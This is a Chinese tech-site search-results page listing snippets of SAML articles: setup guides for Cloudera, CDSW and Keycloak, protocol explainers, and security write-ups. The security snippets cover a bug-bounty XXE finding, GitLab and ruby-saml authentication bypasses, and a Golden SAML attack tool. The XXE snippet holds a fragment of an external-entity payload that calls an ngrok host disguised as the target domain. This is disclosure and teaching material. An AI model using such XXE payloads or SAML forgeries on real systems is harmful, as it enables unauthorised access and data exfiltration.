首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Khan安全团队

    SAML SSO 编写中的 XXE

    今天我将分享我如何在一个 Web 应用程序的 SAML SSO 中找到 XXE。这是 HackerOne 上的一个私人程序,他们正在提供付费计划凭据以进行测试。但是范围有限,因为它们仅限于少数功能。 这个“安全控制”功能吸引了我,因为它允许不同类型的身份验证 我检查了所有这些,发现 SAML 在 IdP 元数据字段中接受 XML。我有一种感觉,在这里我可以找到一些重要的东西。 所以我开始在谷歌上搜索这个 SAML IdP 并来到这个我们可以生成 IdP 元数据的网站。 SYSTEM "https://app.target.com@29de5f70.ngrok.io"> %asd;]> 然后在几周后,这个特性就在范围内,我在那个 XML 中用这个有效载荷报告了它作为“SAML " Location="https://app.target.com" /> <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1

    1.2K10编辑于 2022-01-18
  • 来自专栏大数据杂货铺

    使用SAML配置身份认证

    如何在Cloudera Manager中使用SAML配置身份认证。 SAML的主要用例称为Web浏览器单点登录(SSO)。使用用户代理(通常是Web浏览器)的用户请求受SAML SP保护的Web资源。 它假定您在一般意义上熟悉SAMLSAML配置,并且已经部署了有效的IDP。 注意 • Cloudera Manager支持SP和IDP发起的SSO。 • IDP中的SAML元数据XML文件。该文件必须包含根据SAML元数据互操作性配置文件认证IDP使用的签名/加密密钥所需的公共证书。 4) 将“外部身份认证类型”属性设置为SAML(“ SAML”将忽略“身份认证后端顺序”属性)。 5) 将“ SAML IDP元数据文件的路径”属性设置为指向IDP元数据文件。

    5.1K30发布于 2020-11-09
  • 来自专栏Seebug漏洞平台

    原创Paper | 进宫 SAML 2.0 安全

    作者:Longofo@知道创宇404实验室 日期:2022年11月8日 SAML始于2001年,最终的SAML 2.0版本发布于2005年,此后也没有发布大版本,SAML 2.0一直延续到了现在。 </saml2:AuthenticatingAuthority></saml2:AuthnContext></saml2:AuthnStatement><saml2:AttributeStatement :2.0:status:Success"></saml2p:StatusCode></saml2p:Status><saml2:Assertion xmlns:saml2="urn:oasis:names </saml2:AuthenticatingAuthority></saml2:AuthnContext></saml2:AuthnStatement><saml2:AttributeStatement ">example.com</saml2:AttributeValue></saml2:Attribute></saml2:AttributeStatement></saml2:Assertion></

    9.4K30编辑于 2023-01-05
  • 来自专栏程序那些事

    在wildfly中使用SAML协议连接keycloak

    SAML协议连接keycloak。 使用SAML的场景主要考虑的是SAML的成熟性,或者说公司中已经在使用了SAML了。 SAML的工作流程 在SAML协议中定义了三个角色,分别是principal:代表主体通常表示人类用户。 -09-05T09:22:05Z"> <saml:Issuer>https://idp.flydean.com/SAML2</saml:Issuer> <! </saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement /app-profile-saml/saml Force Name ID Format: ON ?

    3K31发布于 2020-12-31
  • 来自专栏Hadoop实操

    如何使用SAML配置CDSW的身份验证

    配置Cloudera Manager的身份验证》,通过Shibboleth的IDP服务提供SAML认证服务,本篇文章主要介绍如何使用SAML配置CDSW的身份验证。 下图为CDSW集成SAML认证流程。 3.CDSW配置SAML ---- 1.使用管理员登录CDSW,点击“Admin” [bhfylkruul.jpeg] 2.点击“Admin”->“Security”,进入外部身份验证配置界面 SAML [nem4ovim8i.jpeg] [5cp2772pfi.jpeg] 生成的cdsw_saml_metadata.xml文件内容如下: [5bjtqoujd6.jpeg] 2.将生成的cdsw_saml_metadata.xml 在这里CDSW的接口未提供完成的cdsw_saml_metadata.xml配置文件,需要我们自己手动的创建该Metadata。

    5.3K90发布于 2018-03-30
  • 来自专栏PHP专享栏

    详解JWT和Session,SAML, OAuth和SSO,

    SSO 是一类 解决方案 的统称,而在具体的实施方面,我们有两种策略可供选择: SAML 2.0 OAuth 2.0 接下来我们区别这 两种授权方式 有什么不同。 SAML 2.0 下图是 SAML2.0 的流程图,看图说话: ? 还 未登陆 的用户 打开浏览器 访问你的网站( SP),网站 提供服务 但是并 不负责用户认证。 于是 SP 向 IDP 发送了一个 SAML 认证请求,同时 SP 将 用户浏览器 重定向到 IDP。 一旦用户登陆成功, IDP 会生成一个包含 用户信息(用户名 或者 密码)的 SAML token( SAML token 又称为 SAMLAssertion,本质上是 XML 节点)。 那么 OAuth 是如何避免 SAML 流程下 无法解析 POST 内容的信息的呢?

    3.9K20发布于 2019-08-20
  • 来自专栏程序那些事

    安全声明标记语言SAML2.0初探

    SAML的一个非常重要的应用就是基于Web的单点登录(SSO)。 接下来我们一起来看看SAML是怎么工作的。 SAML的构成 在SAML协议中定义了三个角色,分别是principal:代表主体通常表示人类用户。 SAML的优势 为什么要使用SAML呢? 第一可以提升用户体验,如果系统使用SAML,那么可以在登录一次的情况下,访问多个不同的系统服务。 SAML是怎么工作的 接下来,我们通过一个用SAML进行SSO认证的流程图,来分析一下SAML是怎么工作的。 </saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement

    2.3K31发布于 2020-12-31
  • 来自专栏前端开发

    SAML2 HTTP 重定向绑定 URL 详解

    在单点登录场景里,浏览器会被重定向到 IdP 的端点且携带一系列查询参数用于传递 SAML 请求的内容及签名信息。 背景简介SAML2(Security Assertion Markup Language 2.0)是一种用于在身份提供者(IdP)与服务提供者(SP)之间传递认证与授权信息的开源标准。 SAML 协议支持多种传输绑定(Binding),其中 HTTP-Redirect 绑定利用浏览器重定向与 URL 查询参数来传递 SAML 请求,实现了对 GET 方法的兼容。 在这种方式下,SAML 消息首先被压缩、编码并签名,随后嵌入到跳转 URL 的查询字符串里,以便在安全性与兼容性之间取得平衡。 xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://sp.example.com/</saml:Issuer></samlp:AuthnRequest

    34610编辑于 2025-06-30
  • 来自专栏Hadoop实操

    如何使用SAML配置Cloudera Manager的身份验证

    cdhproject 提示:代码块部分可以左右滑动查看噢 1.文档编写目的 在前面Fayson介绍了《如何使用Shibboleth搭建IDP服务并集成OpenLDAP》,通过Shibboleth的IDP服务提供SAML 认证服务,本篇文章主要介绍如何使用SAML配置Cloudera Manager的身份验证。 下图为CM集成SAML认证流程: 内容概述 1.环境准备 2.CM配置SAML及注册IDP 3.登录验证 4.总结 测试环境 1.CM和CDH版本为5.13.1 2.Shibboleth IDP版本为3.3.2 -list -v -keystore temp.keystore -storepass 123456 (可左右滑动) 3.在/opt/cloudera目录下创建assigin_role.sh文件用户SAML 1.使用管理员登录CM,点击“管理”->“设置” 2.进入设置页面选择“外部身份验证” 3.在搜索目录输入SAML,配置相应的SAML信息 4.完成以上配置后,保存更新并重启cloudera-scm-server

    3.2K40发布于 2018-03-29
  • 来自专栏信安百科

    CVE-2024-45409|GitLab SAML身份验证绕过漏洞

    0x01 漏洞描述 OmniAuth-SAML和Ruby-SAML库在GitLab中用于处理基于SAML的身份验证,由于这些库/工具无法正确验证SAML响应的签名,导致存在SAML身份验证绕过漏洞(CVE -2024-45409),威胁者可以制作恶意 SAML 响应从而绕过SAML身份验证并获得对GitLab实例的访问权限。 GitLab CE/EE 17.1.x < 17.1.8 GitLab CE/EE 17.0.x < 17.0.8 GitLab CE/EE 16.11.x < 16.11.10 OmniAuth-SAML 和Ruby-SAML依赖项: omniauth-saml <= 2.1.0 ruby-saml <= 1.12.2 1.13.0 <= ruby-saml <= 1.16.0 0x04 漏洞详情 https

    31210编辑于 2025-07-30
  • 来自专栏程序那些事

    SAML和OAuth2这两种SSO协议的区别

    接下来,我们通过一个用SAML进行SSO认证的流程图,来分析一下SAML是怎么工作的。 ? oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion xmlns:saml="urn -09-05T09:22:05Z"> <saml:Issuer>https://idp.flydean.com/SAML2</saml:Issuer> <! </saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement 也就是说IdP返回的不是直接的SAML assertion,而是一个SAML assertion的引用。SP收到这个引用之后,可以从后台再去查询真实的SAML assertion,从而提高了安全性。

    4.8K41发布于 2020-12-31
  • 来自专栏黑客

    GitHub 发现 ruby-saml 严重漏洞,账户安全岌岌可危

    开源的 ruby - saml 库中,近日披露了两个极为严重的安全漏洞。这两个漏洞等级颇高,可能会让恶意攻击者有机可乘,绕过安全断言标记语言(SAML)的身份验证保护机制。 SAML 是一种基于 XML 的标记语言,同时也是一项开放标准,主要用于在不同各方之间交换身份验证以及授权数据。 目前,ruby - saml 版本 1.12.4 和 1.18.0 已经对这些漏洞进行了修复。微软旗下的 GitHub 在 2024 年 11 月发现并报告了这些漏洞。 GitHub 安全实验室研究员 Peter Stöckli 在一篇博文中指出:“攻击者只要拥有一个有效的签名,就能够利用目标组织用于验证 SAML 响应或断言的密钥,构建出 SAML 断言,进而得以以任意用户身份登录 GitLab 方面表示:“在使用 SAML 身份验证的 GitLab CE/EE 实例中,在某些特定情况下,若攻击者能够获取来自身份提供商(IdP)的有效签名 SAML 文档,就有可能以环境中 SAML

    47110编辑于 2025-03-20
  • 来自专栏xuwd的专栏

    通过saml统一身份认证登录腾讯云控制台实战

    一:什么是saml saml全称:Security Assertion Markup Language,中文叫法是安全断言标记语言。 目前SAML有两标准:Saml 1.1和Saml 2.0。 二:常用场景 saml常用场景是用来作为单点登录的。如:用户在浏览器登录公司账号后,可直接跳转到腾讯云,不再需要输入腾讯云账号密码。 即,saml为安全跳转登录提供了可能。 当然,saml本身出现了问题,概率较小,暂不讨论。 saml联合身份认证,如:salesforce、Azure、onelogin等。

    8.9K101发布于 2019-11-27
  • 来自专栏Spring Security Login

    如何将Spring Security 集成 SAML2 ADFS 实现SSO单点登录?

    SAML 登录概念在学习之前,首先要了解SAML的概念,SAML主要有三个身份:用户/浏览器,服务提供商,身份提供商“身份提供者”和“断言方”是同义词,在ADFS,OKta通常叫做IDP,而在Spring 在SAML中,这些属性信息可能包括用户的姓名、电子邮件地址、角色等。AP通常与IDP分开,以便属性信息可以由专门的实体进行管理。 SP(Service Provider)服务提供者 解释:SP是依赖SAML断言来对用户进行授权的实体。 登录终结点便是终结点SP 配置一、最小依赖 SAML 2.0服务提供者支持在 spring-security-saml2-service-provider 中。 responseUrl: "{baseUrl}/saml/SingleLogout" acs: location: "{baseUrl}/saml/SSO

    5.2K10编辑于 2023-12-04
  • 来自专栏FreeBuf

    shimit:一款针对Golden SAML攻击的安全研究工具

     关于shimit  shimit是一款针对Golden SAML攻击的安全研究工具,该工具基于Python开发,可以帮助广大研究人员通过对目标执行Golden SAML攻击,来更好地学习和理解Golden SAML攻击,并保证目标应用的安全。 在Golden SAML攻击中,攻击者可以使用他们想要的任何权限访问应用程序(支持SAML身份验证的任何应用程序),并且可以是目标应用程序上的任何用户。 -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml \shimit.py -l saml_response.xml 参数解释: l - 从指定文件加载SAMLResponse  工具运行截图   许可证协议  本项目的开发与发布遵循GPL-3.0

    1.1K20编辑于 2023-02-24
  • 来自专栏IDaaS 身份认证管理云平台

    CAS、OAuth、OIDC、SAML有何异同?

    杂乱:CAS 3.0又引入了基于SAML对Service Ticket进行校验; 3. 详细协议标准定义参考: https://openid.net/specs/openid-connect-core-1_0.html 五、SAML 2.0 SAML协议全称为Security Assertion SAML标准定义了身份提供者(Identity Provider)和服务提供者(Service Provider)之间,如何通过SAML规范,采用加密和签名的方式来建立互信,从而交换用户身份信息。 SAML是一个非常古老的Authentication的协议,在早期B/S架构的企业级应用中非常流行。 SAML协议非常庞大,定义了很多optional的细节(即不是必须实现)。 SAML协议的标准定义可参考: http://docs.oasis-open.org/security/saml/Post2.0/sstc-saml-tech-overview-2.0.html 六、各协议简单对比

    35.8K56发布于 2020-10-22
  • 来自专栏网络安全技术点滴分享

    三大安全认证授权协议深度对比:OAuth、OpenID Connect与SAML

    安全断言标记语言(SAML)深度解析安全断言标记语言(SAML)是一种基于XML的标准,设计用于在各方之间交换认证和授权数据。 与OAuth和OpenID Connect不同,SAML更适合涉及跨域SSO的场景,如企业应用程序。在SAML架构中,身份提供者(IDP)作为受信任的实体,认证用户并发布称为SAML断言的安全令牌。 SAML SSO流程涉及用户访问服务提供者提供的服务。如果用户未经过认证,SP将用户重定向到IDP的单点登录服务。成功认证后,IDP发布SAML断言,该断言发送回SP以完成SSO过程。 SAML可能在SSO过程中涉及额外的用户交互,可能影响用户体验集成复杂性OAuth和OpenID Connect更容易集成,具有明确定义的协议和适用于各种平台的全面库SAML基于XML的特性可能需要更多集成工作 主要平台和服务提供商的采用进一步巩固了它们的地位,使SAML基于其现有存在进行竞争。

    46610编辑于 2025-10-24
  • 来自专栏FreeBuf

    挖洞经验 | 看我如何利用SAML漏洞实现Uber内部聊天系统未授权登录

    为了发现该系统SAML框架的服务漏洞,我决定构造一个简单的SAML声明,通过POST请求方式把它发送到其服务端去。有关SAML单点登录(SSO)的基本机制,可点此了解查看。 为了验证该聊天系统SAML服务是否部署了签名校验功能,我打算在POST请求中加入一个不带签名的简单XML标记,形成SAML请求一并发送至SAML服务端。 "2016-05-04T01:40:34Z"> <saml:AudienceRestriction> <saml:Audience> php-saml </saml:Audience> </saml:AudienceRestriction :AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement> </saml:Attribute> <saml:Attribute NameFormat string"> Administrator </saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion

    1.9K60发布于 2018-03-01
  • 来自专栏Java技术专题

    【分布式技术专题】「单点登录技术架构」一文带领你好好认识以下Saml协议的运作机制和流程模式

    SAML请求SAML请求,也称为身份验证请求,由服务提供商生成以“请求”身份验证。SAML响应SAML响应由身份提供者生成。它包含经过身份验证的用户的实际断言。 暴露SP中的SAML配置。为每个人启用SAML,而不是为部分用户。实施“后门”了解服务提供商的角色SAML IdP根据IdP和SP共同同意的配置生成SAML响应。 IdP登录URL-这是发布SAML请求的IdP端的终结点,SP需要从IdP获取此信息。实现SAML的最简单方法是利用开源SAML工具包。这些工具包提供了消化传入SAML响应中的信息所需的逻辑。 SAML IdP在收到SAML请求后,获取RelayState值,并在用户通过身份验证后将其作为HTTP参数附加回SAML响应中。 当SAML响应返回时,SP可以使用RelayState值并将经过身份验证的用户带到正确的资源。图片暴露SP中的SAML配置如前所述,SP需要IdP配置来完成SAML设置。

    4.2K00编辑于 2023-04-14
  • 来自专栏全栈程序员必看

    Salesforce中的单点登录简介「建议收藏」

    Salesforce中的单点登录工作原理 当用户尝试登录时,Salesforce会生成并发出一个SAML请求 SAML请求会发送到身份提供商 身份提供商会验证该用户的身份,并发回一个SAML验证结果 Salesforce 选择“启用SAML”。 指定身份提供商使用的SAML版本。 保存。 在SAML单点登录设置中,可以用三种方式新建配置: 新建:手动指定所有设置。 即时用户配置配合使用SAML身份提供商以将正确的用户信息以SAML 2.0声明传递到Salesforce。 测试单点登录连接 在配置了SAML设置后,可以通过访问身份提供商的应用程序来测试它。 在“设置”界面中的“单点登录设置”界面,可以点击“SAML声明验证器”来验证SAML配置。 在“设置”界面中的“登录历史”界面,可以查看登录的历史。 当单点登录出现问题时,可以通过这里来查找原因,也可以使用“SAML声明验证器”来验证SAML配置。

    2.2K50编辑于 2022-09-20
领券